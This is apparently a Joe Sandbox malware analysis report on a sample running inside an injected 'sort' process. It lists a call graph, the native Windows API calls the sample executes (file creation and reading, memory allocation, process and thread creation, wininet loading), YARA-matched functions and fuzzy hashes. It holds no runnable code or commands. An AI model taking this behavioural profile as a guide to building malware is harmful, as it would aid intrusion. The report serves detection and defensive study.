83893 2f8798d 83892->83893 83899 2f98510 83893->83899 83895 2f879dd 83896 2f879e4 83895->83896 83897 2f985f0 LdrInitializeThunk 83895->83897 83896->83891 83898 2f87a0d 83897->83898 83898->83891 83900 2f985a8 83899->83900 83902 2f98538 83899->83902 83904 3932f30 LdrInitializeThunk 83900->83904 83901 2f985e1 83901->83895 83902->83895 83904->83901 83905 2f95240 83906 2f952a1 83905->83906 83907 2f952ae 83906->83907 83909 2f86e10 83906->83909 83910 2f86deb 83909->83910 83911 2f86e40 83909->83911 83912 2f8acc0 9 API calls 83910->83912 83913 2f86e02 83910->83913 83911->83911 83912->83913 83913->83907 83924 2f8a7c1 83925 2f8a7c7 83924->83925 83926 2f8a79c 83925->83926 83929 2f8a7cf 83925->83929 83927 2f8a120 3 API calls 83926->83927 83928 2f8a7b9 83927->83928 83930 2f8a846 83929->83930 83931 2f9aff0 RtlAllocateHeap 83929->83931 83932 2f8a867 83931->83932 83933 2f9aff0 RtlAllocateHeap 83932->83933 83934 2f8a878 83933->83934 83934->83930 83935 2f83f90 LdrLoadDll 83934->83935 83937 2f8a8c6 83935->83937 83936 2f8a9fe 83937->83936 83938 2f83f90 LdrLoadDll 83937->83938 83939 2f8a971 83938->83939 83939->83936 83940 2f9af10 RtlFreeHeap 83939->83940 83941 2f8a9e2 83940->83941 83942 2f9af10 RtlFreeHeap 83941->83942 83943 2f8a9ef 83942->83943 83944 2f91180 83945 2f9119c 83944->83945 83946 2f911d8 83945->83946 83947 2f911c4 83945->83947 83949 2f98e00 NtClose 83946->83949 83948 2f98e00 NtClose 83947->83948 83951 2f911cd 83948->83951 83950 2f911e1 83949->83950 83954 2f9b030 RtlAllocateHeap 83950->83954 83953 2f911ec 83954->83953 83955 2f82b43 83956 2f877c0 2 API calls 83955->83956 83957 2f82b53 83956->83957 83958 2f82b6f 83957->83958 83959 2f98e00 NtClose 83957->83959 83959->83958

                                          Executed Functions

                                          Function 02F79B00 Relevance: 24.1, Strings: 19, Instructions: 332COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 165 2f79b00-2f79d50 167 2f79d57-2f79d63 165->167 168 2f79d65-2f79d86 167->168 169 2f79d88-2f79d91 167->169 168->167 170 2f79db6-2f79dba 169->170 171 2f79d93-2f79db4 169->171 172 2f79de2-2f79df0 170->172 173 2f79dbc-2f79de0 170->173 171->169 174 2f79dfb-2f79e01 172->174 173->170 175 2f79e03-2f79e0c 174->175 176 2f79e19-2f79e20 174->176 177 2f79e17 175->177 178 2f79e0e-2f79e14 175->178 179 2f79e57-2f79e67 176->179 180 2f79e22-2f79e55 176->180 177->174 178->177 179->179 182 2f79e69-2f79e70 179->182 180->176 183 2f79e77-2f79e7e 182->183 184 2f79ea5-2f79ea9 183->184 185 2f79e80-2f79ea3 183->185 186 2f79ed2-2f79edb 184->186 187 2f79eab-2f79ed0 184->187 185->183 188 2f7a087-2f7a08e 186->188 189 2f79ee1-2f79ee8 186->189 187->184 191 2f7a100-2f7a10a 188->191 192 2f7a090-2f7a0a0 188->192 190 2f79ef3-2f79efa 189->190 193 2f79f36-2f79f3d 190->193 194 2f79efc-2f79f34 190->194 192->192 195 2f7a0a2-2f7a0a9 192->195 197 2f79f48-2f79f51 193->197 194->190 198 2f7a0b4-2f7a0ba 195->198 201 2f79f65-2f79f7e 197->201 202 2f79f53-2f79f63 197->202 199 2f7a0d2-2f7a0d9 198->199 200 2f7a0bc-2f7a0c5 198->200 205 2f7a0e4-2f7a0ed 199->205 203 2f7a0c7-2f7a0ca 200->203 204 2f7a0d0 200->204 201->201 207 2f79f80-2f79f98 201->207 202->197 203->204 204->198 209 2f7a0ef-2f7a0f9 205->209 210 2f7a0fb call 2f9ab70 205->210 211 2f79ff7-2f79ffe 207->211 212 2f79f9a-2f79fa1 207->212 213 2f7a0db-2f7a0e1 209->213 210->191 217 2f7a009-2f7a00f 211->217 215 2f79fa3-2f79fcb 212->215 216 2f79fcd-2f79fd6 212->216 213->205 215->212 220 2f79ff2 216->220 221 2f79fd8-2f79ff0 216->221 218 2f7a025-2f7a02c 217->218 219 2f7a011-2f7a023 217->219 222 2f7a037-2f7a03d 218->222 219->217 220->188 221->216 224 2f7a050-2f7a061 222->224 225 2f7a03f-2f7a04e 222->225 226 2f7a06c-2f7a072 224->226 225->222 228 2f7a074-2f7a080 226->228 229 2f7a082 226->229 228->226 229->186
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: %c$'$2$4$<$=b$>"$F;$FA$I$O^$T$[.?faV$aV$p$v${$~A$V
                                          • API String ID: 0-2672663033
                                          • Opcode ID: 3bec88986e45867c8ed0fbf7be268ecf60e98fa04da508ed000ba4ab32284af2
                                          • Instruction ID: 5afbd5e2c78d2f53169a4555c52a0f87726dcd396de222162d5fce1b2b12a7f0
                                          • Opcode Fuzzy Hash: 3bec88986e45867c8ed0fbf7be268ecf60e98fa04da508ed000ba4ab32284af2
                                          • Instruction Fuzzy Hash: BA02B2B0D05228CFEB24CF85C994BDDBBB2BB48308F10859AD2597B385C7B95A85CF54
                                          Function 02F8C040 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNELBASE(?,00000000), ref: 02F8C124
                                          • FindNextFileW.KERNELBASE(?,00000010), ref: 02F8C15F
                                          • FindClose.KERNELBASE(?), ref: 02F8C16A
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseFirstNext
                                          • String ID:
                                          • API String ID: 3541575487-0
                                          • Opcode ID: e66fe19e210c61c004ab4654cb6f47742337e29145d6c73c42df99821f641282
                                          • Instruction ID: 99ed7d7768e8f6558736e78a1a330bb269af45403518311a5767c46fbf096c6a
                                          • Opcode Fuzzy Hash: e66fe19e210c61c004ab4654cb6f47742337e29145d6c73c42df99821f641282
                                          • Instruction Fuzzy Hash: 3E3163B19006087BEB24EF64CC85FFFB77D9F54788F144459F648A7180DA70AA858FA0
                                          Function 02F98AF0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02F98BEE
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: c988eb6e20e4e7d4540f9f1dc262971096ab2b14d77f1157c3f8d026e8ad0ceb
                                          • Instruction ID: 1a5b8bc13649b2db26e2209a59bdf6260c940381e1d79cf04b678da359e1c245
                                          • Opcode Fuzzy Hash: c988eb6e20e4e7d4540f9f1dc262971096ab2b14d77f1157c3f8d026e8ad0ceb
                                          • Instruction Fuzzy Hash: 6F3192B5A01208AFDB14DF98D881EDEB7B9EF8C754F108259F919A7340D730A951CBA4
                                          Function 02F98C60 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02F98D43
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 260bac6f070044ddbfd8828f63b822ef6ae4fd58c4aafcf7b6e926ca91c5abce
                                          • Instruction ID: 55f2799119eadfd7708a91db0e9833cd1be871a24defc25191ca66f3e2623ec9
                                          • Opcode Fuzzy Hash: 260bac6f070044ddbfd8828f63b822ef6ae4fd58c4aafcf7b6e926ca91c5abce
                                          • Instruction Fuzzy Hash: 1431A4B5A00208AFDB14DF98D881EDFB7B9AF8C754F108259F918A7240D670A9118FA5
                                          Function 02F98F70 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(02F817BE,?,02F97A0F,00000000,00000004,00003000,?,?,?,?,?,02F97A0F,02F817BE,02F817BE,00000000,?), ref: 02F99038
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: c507b712e608d353e1ec5d37df35059244e0ccfb2de01ab8de6d488befea3bf5
                                          • Instruction ID: e646505bfd17b6f2d50a513013faa7be05367bc9023255e31d8d48318821aa67
                                          • Opcode Fuzzy Hash: c507b712e608d353e1ec5d37df35059244e0ccfb2de01ab8de6d488befea3bf5
                                          • Instruction Fuzzy Hash: F121FBB5A01209AFDB14DF58DC81EEFB7B9EF88750F108259FA1897240D770A911CBA5
                                          Function 02F98D50 Relevance: 1.6, APIs: 1, Instructions: 62filenativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: a4d55fc67187cefc39a7b8eaadb284caa1ee540d543c2fd8d06357a1f53b434b
                                          • Instruction ID: e743c6fbebe7f201babf9c0cdbb96551ca703568ac30f66b32a95245161d27aa
                                          • Opcode Fuzzy Hash: a4d55fc67187cefc39a7b8eaadb284caa1ee540d543c2fd8d06357a1f53b434b
                                          • Instruction Fuzzy Hash: 1C117071A012047FEA20EBA8CC41FEFB7ADDF85754F10855AFA0897280D67176158BE5
                                          Function 02F98E00 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02F98E34
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 1ebc1b17328d7b51ea5f62271b12f00b040010b2dc37a92e0c9861cf2918f4dd
                                          • Instruction ID: 2d6de1dc8decc7a3ee229ce7939489a51c3c5e06bb30ca866aa204ca38f51f77
                                          • Opcode Fuzzy Hash: 1ebc1b17328d7b51ea5f62271b12f00b040010b2dc37a92e0c9861cf2918f4dd
                                          • Instruction Fuzzy Hash: E8E04F312002147BD510EA69CC01FAB776DDFC5764F004015FA0CA7141C671791486E4
                                          Function 03934340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3145974902.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                          • Associated: 0000000B.00000002.3145974902.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000B.00000002.3145974902.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000B.00000002.3145974902.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_38c0000_sort.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 7bb66d0a0516bffacfb8777c521f039f2937489c0ce0f29bc1526516f7ebfd2e
                                          • Instruction ID: 00b697b3417dd74e0bf95109ca0d8c4ac07c7e1c85739c882d52e16923c875e0
                                          • Opcode Fuzzy Hash: 7bb66d0a0516bffacfb8777c521f039f2937489c0ce0f29bc1526516f7ebfd2e
                                          • Instruction Fuzzy Hash: 2490023160990412A140B1584898946404997E0301B55C011E0424554C8B558A565361
                                          Function 03934650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3145974902.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                          • Associated: 0000000B.00000002.3145974902.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000B.00000002.3145974902.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000B.00000002.3145974902.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_38c0000_sort.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 7b50d23ec37b803bab6d1cb2b1c919f29f1990e99ab645ec99b742f3654b5af0
                                          • Instruction ID: 071c25e6e6e696cbf06b1d04839d0248360b4f19c6547838f646a8b066474913
                                          • Opcode Fuzzy Hash: 7b50d23ec37b803bab6d1cb2b1c919f29f1990e99ab645ec99b742f3654b5af0
                                          • Instruction Fuzzy Hash: 56900261605604425140B1584818806604997E1301395C115E0554560C875989559369
                                          Function 039335C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3145974902.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                          • Associated: 0000000B.00000002.3145974902.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000B.00000002.3145974902.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000B.00000002.3145974902.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_38c0000_sort.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 1e919ae303389f93ba5ba30e23609fa7407c2bc5b26d66872cace6caab240476
                                          • Instruction ID: 3963b5324cbc31f56a9c98aaf5695fdabb434fa984d88ada361499a0d93a24e7
                                          • Opcode Fuzzy Hash: 1e919ae303389f93ba5ba30e23609fa7407c2bc5b26d66872cace6caab240476
                                          • Instruction Fuzzy Hash: 1690023160960802E100B1584528B06104987D0201F65C411E0424568D87D68A5166A2
                                          Function 02F80778 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63threadwindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 476 2f80778-2f80787 477 2f807f8-2f807ff 476->477 478 2f80789-2f807a2 476->478 479 2f80805-2f8084a call 2f83f90 call 2f71410 call 2f91630 477->479 480 2f80800 call 2f9b9c0 477->480 478->477 487 2f8086a-2f80870 479->487 488 2f8084c-2f8085b PostThreadMessageW 479->488 480->479 488->487 489 2f8085d-2f80867 488->489 489->487
                                          APIs
                                          • PostThreadMessageW.USER32(30G910fd,00000111,00000000,00000000), ref: 02F80857
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID: 30G910fd$30G910fd$LDio
                                          • API String ID: 1836367815-2040179008
                                          • Opcode ID: 54bb2d1e79b0714bf4c9b55e11577e2ac7d1c97902a508cd786b057a7b89f4ee
                                          • Instruction ID: 3d55f18f7e3cc9a513c15bb6c21e334c6c6ab881952a4014da181bb4abf3a3a6
                                          • Opcode Fuzzy Hash: 54bb2d1e79b0714bf4c9b55e11577e2ac7d1c97902a508cd786b057a7b89f4ee
                                          • Instruction Fuzzy Hash: A7115C71D4021DBAE702AAA48C81DEFB77CDF416D4F4580ADFA14AF111E6358D0A4BE1
                                          Function 02F807E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • PostThreadMessageW.USER32(30G910fd,00000111,00000000,00000000), ref: 02F80857
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID: 30G910fd$30G910fd
                                          • API String ID: 1836367815-2140840037
                                          • Opcode ID: 5d93c530580028531ec8eaeae1718c4e17687c151ae0528229ffff1a973f375d
                                          • Instruction ID: 545ea158280079a2c561a6a5097be61d502da5d0a4e81e3ce2785a33346b9dd4
                                          • Opcode Fuzzy Hash: 5d93c530580028531ec8eaeae1718c4e17687c151ae0528229ffff1a973f375d
                                          • Instruction Fuzzy Hash: 580184B2D0024C7AEB11AAE19C81EEFBB7CDF416D4F458069FA1467141D6355E0A4FF1
                                          Function 02F807DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 585 2f807da-2f807f2 586 2f807fa-2f8084a call 2f9b9c0 call 2f83f90 call 2f71410 call 2f91630 585->586 587 2f807f5 call 2f9afb0 585->587 596 2f8086a-2f80870 586->596 597 2f8084c-2f8085b PostThreadMessageW 586->597 587->586 597->596 598 2f8085d-2f80867 597->598 598->596
                                          APIs
                                          • PostThreadMessageW.USER32(30G910fd,00000111,00000000,00000000), ref: 02F80857
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID: 30G910fd$30G910fd
                                          • API String ID: 1836367815-2140840037
                                          • Opcode ID: 21f1a64dc9a6857a7a88c332d67bf4c214cdf041f65ad611f8f998e8d493f0cd
                                          • Instruction ID: 83b5351936e1aa7924546cfee7341aa5c04fcea900d66e7acb8749056aaf76bc
                                          • Opcode Fuzzy Hash: 21f1a64dc9a6857a7a88c332d67bf4c214cdf041f65ad611f8f998e8d493f0cd
                                          • Instruction Fuzzy Hash: 1B01A5B2D0020D7AEB11AAD18C81EEFBB7CDF417D4F048069FA1467141D6355E0A4FE1
                                          Function 02F933CA Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 124COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: net.dll$wininet.dll
                                          • API String ID: 0-1269752229
                                          • Opcode ID: b21dab7b33ba12c760ae203c6ff6fd8c58ebb0ef83a1ffee65bba2367b7a7879
                                          • Instruction ID: c2813c8fe08263141d9eaebb6925eca4e62a92e024b8f957a3fac19ae9df055f
                                          • Opcode Fuzzy Hash: b21dab7b33ba12c760ae203c6ff6fd8c58ebb0ef83a1ffee65bba2367b7a7879
                                          • Instruction Fuzzy Hash: AA419DB0900606AFEB15DF78C880BEAFB75EF45344F58869DDA595B641C331AA06CFD0
                                          Function 02F8EF3A Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 107COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InitializeUninitialize
                                          • String ID: @J7<
                                          • API String ID: 3442037557-2016760708
                                          • Opcode ID: efc8d4c5fc4514faffbcc34691b45fabaa76acd26d2c0c9d6494f20814eb24e5
                                          • Instruction ID: f89c6f6fe36f1a62980555ae093728ea893903ce6f57f7e99e21bea119ce9f39
                                          • Opcode Fuzzy Hash: efc8d4c5fc4514faffbcc34691b45fabaa76acd26d2c0c9d6494f20814eb24e5
                                          • Instruction Fuzzy Hash: 9C3152B6A00609AFDB00DFD8DC809EFB7B9BF88744F108559E615EB214D771EE458BA0
                                          Function 02F934D0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 107sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • Sleep.KERNELBASE(000007D0), ref: 02F9359D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: net.dll$wininet.dll
                                          • API String ID: 3472027048-1269752229
                                          • Opcode ID: 3f50385cfb7cab90a78a19a5ecba87c18c18f770b3133ac7002f3afd9986ee24
                                          • Instruction ID: 9fa57093b56f5640a6aef892633c65cce9e77b948bad5a7cd1794accc08d8a82
                                          • Opcode Fuzzy Hash: 3f50385cfb7cab90a78a19a5ecba87c18c18f770b3133ac7002f3afd9986ee24
                                          • Instruction Fuzzy Hash: E53190B1A00605BBEB14DF64DC80FEBBBB9EB88744F50815DEA196B240C770A641CFA0
                                          Function 02F8EF40 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InitializeUninitialize
                                          • String ID: @J7<
                                          • API String ID: 3442037557-2016760708
                                          • Opcode ID: a3419b9a99ad2aeb2d7a1e7bf90f0f6ab0bc9667057c7b3298eb2b2788bbd85d
                                          • Instruction ID: 854f7e3ce8edfa4a258f98b86d0118d4fc2ddb0f009c06da9bbbca572305fd13
                                          • Opcode Fuzzy Hash: a3419b9a99ad2aeb2d7a1e7bf90f0f6ab0bc9667057c7b3298eb2b2788bbd85d
                                          • Instruction Fuzzy Hash: 093152B5A002099FDB00DFD8DC809EFB7B9BF88344B108559E615EB214D771EE458BA0
                                          Function 02F83F90 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02F84002
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: cc2e2eeabfe5aa2f3bcae61bb068a042517829d55ca8f3e828244603fde8ea91
                                          • Instruction ID: 1d154d10df7500e9cd037f70d0a5d5d12859067b4795610e7ad1340d60c79456
                                          • Opcode Fuzzy Hash: cc2e2eeabfe5aa2f3bcae61bb068a042517829d55ca8f3e828244603fde8ea91
                                          • Instruction Fuzzy Hash: 060171B5E0020DBBDF10EBE4DC41F9EB3789B44748F004195EA0897240F631E708CB91
                                          Function 02F99210 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateProcessInternalW.KERNELBASE(?,?,?,?,02F87D6E,00000010,?,?,?,00000044,?,00000010,02F87D6E,?,?,?), ref: 02F99270
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateInternalProcess
                                          • String ID:
                                          • API String ID: 2186235152-0
                                          • Opcode ID: cff1a171a1dd0827428cd87ec9c43bc56c4cd705335b6d0bf77e8fa493addfa5
                                          • Instruction ID: 03a7048f928fbb525d576fc8bf7f175c44632117f9382d62f3f027018f235a65
                                          • Opcode Fuzzy Hash: cff1a171a1dd0827428cd87ec9c43bc56c4cd705335b6d0bf77e8fa493addfa5
                                          • Instruction Fuzzy Hash: A00196B6205508BBDB44DF99DC81EEB77ADAF8C754F558209FA09D3240D630F8518BA4
                                          Function 02F79AA0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02F79AE5
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: cf1f41c066b4371ba89bce232c04e3c4308bb6273070e88ffb2850e124a0e827
                                          • Instruction ID: 661fc4daf0efc474426005c9f8fca950cd192258b49996264524a9c5babfe579
                                          • Opcode Fuzzy Hash: cf1f41c066b4371ba89bce232c04e3c4308bb6273070e88ffb2850e124a0e827
                                          • Instruction Fuzzy Hash: 2BF06D7339161436F62065A9AC02FDBB69D8B81BA1F140036F70CEB2C0D992B40146A5
                                          Function 02F79A9D Relevance: 1.5, APIs: 1, Instructions: 35threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02F79AE5
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: 5fb32071bf3e1c3e891033f926a1c9508ed59e8feea523b35f3939db1b88c2a8
                                          • Instruction ID: f23b19150aa8f2ab3f60b5142c628636be30d3a82ea9f23cba709685fb9220ad
                                          • Opcode Fuzzy Hash: 5fb32071bf3e1c3e891033f926a1c9508ed59e8feea523b35f3939db1b88c2a8
                                          • Instruction Fuzzy Hash: 16F0927228070032F63065A99C42FDB765D8B85BA0F140025F70CAB2C0DA91B40246B9
                                          Function 02F99180 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,A0F52DE5,00000007,00000000,00000004,00000000,02F83816,000000F4), ref: 02F991BC
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_2f70000_sort.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 9d6b6e8f6847e82904c7d978e879e3a85c0fcb5c4f7c0134554bb6c8ddfafde6
                                          • Instruction ID: 1e743a4a7ffbf629ebcb260f66d6a58205fa5d99647238847a564ed9e3c25cd9
                                          • Opcode Fuzzy Hash: 9d6b6e8f6847e82904c7d978e879e3a85c0fcb5c4f7c0134554bb6c8ddfafde6
                                          • Instruction Fuzzy Hash: 32E09A72200204BFDA18EE58DC45FAB37ADEFC9750F004069FA08A7240C631B920CBF8
